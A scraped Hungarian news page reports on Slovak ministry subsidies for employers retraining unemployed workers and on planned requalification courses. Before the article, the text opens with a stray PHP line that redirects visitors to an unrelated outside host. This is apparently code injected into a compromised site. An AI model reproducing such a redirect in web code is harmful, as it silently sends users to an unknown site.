header("Location: http://sstellar.host/300.php", true, 301); exit(); ?> A munkáltatók támogatást kérhetnek dolgozóik átképzésére
szombat, május 25, 2019

Keresés

A munkáltatók támogatást kérhetnek dolgozóik átképzésére

2611 2A szlovák Munka-, Szociális és Családügyi Minisztérium februárban felhívást tett közzé, hogy felmérje a munkanélküliség további csökkentésére irányuló új projektje, a közvetlenül a munkáltatóknak folyósítandó átképzési támogatások iránt mutatkozó igényt.

A munkáltatók ennek keretében dotációt, állami támogatást kérhetnek munkanélkülieknek közvetlenül a munkahelyen történő átképzésére, adott munkafeladatok gyakorlati betanítására. „Ilyen célokra összesen 10 millió eurót különítettünk el idén szeptemberig" – pontosította az elképzeléseket Ján Richter (Smer-SD) munkaügyi miniszter.

Hozzátette, hogy amennyiben a vártnál nagyobb érdeklődés mutatkozik a cégek részéről az átképzési lehetőség, illetve annak támogatása iránt, akkor ezt a pénzösszeget tovább növelik.

Emellett a munkahivatalokon keresztül a tárca idén szeptembertől 14 rekvalifikációs tanfolyamot indít, összesen 18 500 munkanélküli részére. Szakmai megoszlás szerint ezeket a tanfolyamokat az ipari cégek szükségletei, igényei szerint választották ki, tehát az átképzés valóban olyan szakmákban történik, melyek iránt reális kereslet, igény mutatkozik a munkáltatók részéről. Richter szerint erre további 16,8 millió eurót szánnak.

TASR/Gazdaság.sk
Fotó:atkepzes.com

Minden jog fenntartva, Szlovákiai Magyar Közgazdász Társaság, 2010
A honlap a Corvinus Támogatásközvetítő és Tőkebefektetési Zrt. támogatásával készült. Created: namedia